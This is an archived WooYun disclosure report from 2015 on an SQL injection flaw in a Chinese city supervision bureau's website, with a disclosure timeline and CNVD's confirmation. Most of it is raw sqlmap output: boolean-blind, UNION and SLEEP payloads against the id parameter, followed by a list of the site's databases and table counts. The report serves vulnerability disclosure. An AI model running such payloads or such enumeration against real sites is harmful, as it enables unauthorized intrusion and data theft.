乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 细节已通知厂商并且等待厂商处理中 2015-09-10: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-20: 细节向核心白帽子及相关领域专家公开 2015-09-30: 细节向普通白帽子公开 2015-10-10: 细节向实习白帽子公开 2015-10-25: 细节向公众公开
某市监察局存在SQL注射。泄露重要信息,dba权限
主办方:宣威市监察局http://**.**.**.**/http://**.**.**.**/show.php?id=18382&catid=8
sqlmap identified the following injection points with a total of 39 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=18382 AND 4309=4309&catid=8 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: id=18382 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176706271,0x55536b6f787671524941,0x7176707171),NULL,NULL#&catid=8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=18382 AND SLEEP(5)&catid=8---web server operating system: Windowsweb application technology: PHP 5.3.28, Apache 2.4.9back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=18382 AND 4309=4309&catid=8 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: id=18382 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176706271,0x55536b6f787671524941,0x7176707171),NULL,NULL#&catid=8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=18382 AND SLEEP(5)&catid=8---web server operating system: Windowsweb application technology: PHP 5.3.28, Apache 2.4.9back-end DBMS: MySQL 5.0.11available databases [7]:[*] dwgk[*] information_schema[*] mysql[*] performance_schema[*] phpcmsv9[*] test[*] xwzfjsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=18382 AND 4309=4309&catid=8 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: id=18382 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176706271,0x55536b6f787671524941,0x7176707171),NULL,NULL#&catid=8 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=18382 AND SLEEP(5)&catid=8---web server operating system: Windowsweb application technology: PHP 5.3.28, Apache 2.4.9back-end DBMS: MySQL 5.0.11available databases [7]:[*] dwgk[*] information_schema[*] mysql[*] performance_schema[*] phpcmsv9[*] test[*] xwzfjDatabase: performance_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| setup_consumers | 8 || performance_timers | 5 || setup_timers | 1 |+---------------------------------------+---------+Database: phpcmsv9+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| v9_news | 13560 || v9_news_data | 13552 || v9_hits | 13548 || v9_attachment | 12154 || v9_search | 11508 || v9_attachment_index | 11369 || v9_pay_account | 6586 || v9_linkage | 3284 || v9_collection_content | 1416 || v9_collection_history | 1416 || v9_content_check | 1414 || v9_category_priv | 1042 || v9_poster_201305 | 877 || v9_message | 713 || v9_poster_201311 | 493 || v9_comment | 428 || v9_poster_201310 | 424 || v9_comment_data_1 | 418 || v9_poster_201312 | 411 || v9_admin_role_priv | 410 || v9_comment_check | 401 || v9_poster_201508 | 361 || v9_poster_201403 | 357 || v9_poster_201507 | 356 || v9_poster_201404 | 346 || v9_poster_201411 | 345 || v9_menu | 339 || v9_poster_201309 | 339 || v9_poster_201211 | 332 || v9_poster_201506 | 324 || v9_poster_201406 | 320 || v9_poster_201407 | 317 || v9_poster_201405 | 312 || v9_poster_201212 | 306 || v9_poster_201308 | 277 || v9_poster_201410 | 262 || v9_poster_201301 | 250 || v9_template_bak | 250 || v9_poster_201412 | 249 || v9_poster_201306 | 230 || v9_poster_201408 | 218 || v9_poster_201505 | 214 || v9_poster_201409 | 212 || v9_poster_201402 | 211 || v9_poster_201307 | 205 || v9_poster_201401 | 200 || v9_poster_201501 | 199 || v9_poster_201207 | 197 || v9_poster_201206 | 194 || v9_poster_201303 | 165 || v9_poster_201208 | 152 || v9_poster_201304 | 133 || v9_model_field | 124 || v9_poster_201302 | 114 || v9_poster_201502 | 93 || v9_poster_201209 | 89 || v9_poster_201210 | 81 || v9_poster_201503 | 58 || v9_poster | 55 || v9_poster_201205 | 55 || v9_poster_201504 | 51 || v9_poster_201509 | 43 || v9_category | 38 || v9_cache | 29 || v9_module | 25 || v9_collection_program | 24 || v9_session | 11 || v9_admin_role | 8 || v9_urlrule | 8 || v9_member_group | 7 || v9_model | 6 || v9_sso_messagequeue | 6 || v9_type | 6 || v9_admin | 5 || v9_sso_settings | 5 || v9_collection_node | 4 || v9_workflow | 4 || v9_admin_panel | 3 || v9_department | 3 || v9_member_menu | 3 || v9_position_data | 3 || v9_poster_space | 3 || v9_member_detail | 2 || v9_sso_members | 2 || v9_comment_setting | 1 || v9_comment_table | 1 || v9_page | 1 || v9_position | 1 || v9_site | 1 || v9_special | 1 || v9_sso_admin | 1 || v9_sso_applications | 1 |+---------------------------------------+---------+Database: dwgk+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| v9_linkage | 3284 || v9_hits | 465 || v9_news | 465 || v9_news_data | 465 || v9_search | 465 || v9_menu | 328 || v9_attachment | 202 || v9_attachment_index | 172 || v9_admin_role_priv | 85 || v9_model_field | 77 || v9_category_priv | 63 || v9_template_bak | 46 || v9_cache | 26 || v9_module | 24 || v9_position_data | 18 || v9_admin_role | 13 || v9_admin | 12 || v9_category | 12 || v9_type | 9 || v9_link | 8 || v9_urlrule | 8 || v9_member_group | 7 || v9_sso_settings | 5 || v9_admin_panel | 4 || v9_model | 4 || v9_workflow | 4 || v9_member_menu | 3 || v9_position | 2 || v9_collection_node | 1 || v9_collection_program | 1 || v9_comment_setting | 1 || v9_comment_table | 1 || v9_dbsource | 1 || v9_session | 1 || v9_site | 1 || v9_sso_admin | 1 || v9_sso_applications | 1 |+---------------------------------------+---------+Database: xwzfj+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| v9_linkage | 3284 || v9_attachment | 1039 || v9_keyword_data | 991 || v9_attachment_index | 977 || v9_hits | 340 || v9_search | 340 || v9_menu | 336 || v9_news | 300 || v9_news_data | 300 || v9_keyword | 293 || v9_model_field | 126 || v9_admin_role_priv | 120 || v9_category_priv | 114 || v9_collection_content | 42 || v9_collection_history | 42 || v9_picture | 37 || v9_picture_data | 37 || v9_cache | 29 || v9_position_data | 26 || v9_module | 25 || v9_category | 18 || v9_poster | 10 || v9_poster_space | 10 || v9_urlrule | 8 || v9_member_group | 7 || v9_admin_role | 6 || v9_model | 6 || v9_sso_settings | 5 || v9_template_bak | 5 || v9_type | 5 || v9_workflow | 4 || v9_member_menu | 3 || v9_newsvideo | 3 || v9_newsvideo_data | 3 || v9_admin | 2 || v9_collection_node | 2 || v9_collection_program | 2 || v9_link | 2 || v9_session | 2 || v9_comment_setting | 1 || v9_comment_table | 1 || v9_copyfrom | 1 || v9_datacall | 1 || v9_position | 1 || v9_site | 1 || v9_sso_admin | 1 || v9_sso_applications | 1 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 1047 || help_topic | 511 || help_keyword | 467 || help_category | 40 || `user` | 2 || db | 2 || proxies_priv | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 4084 || INNODB_BUFFER_PAGE | 3008 || STATISTICS | 1115 || PARTITIONS | 407 || TABLES | 407 || KEY_COLUMN_USAGE | 375 || TABLE_CONSTRAINTS | 336 || SESSION_VARIABLES | 331 || GLOBAL_VARIABLES | 319 || GLOBAL_STATUS | 312 || SESSION_STATUS | 312 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || INNODB_BUFFER_PAGE_LRU | 142 || USER_PRIVILEGES | 56 || CHARACTER_SETS | 39 || SCHEMA_PRIVILEGES | 32 || PLUGINS | 23 || ENGINES | 9 || SCHEMATA | 7 || INNODB_CMP | 5 || INNODB_CMP_RESET | 5 || INNODB_CMPMEM | 5 || INNODB_CMPMEM_RESET | 5 || INNODB_BUFFER_POOL_STATS | 1 || PROCESSLIST | 1 |+---------------------------------------+---------+
。。。
危害等级:中
漏洞Rank:10
确认时间:2015-09-10 17:04
CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。
暂无
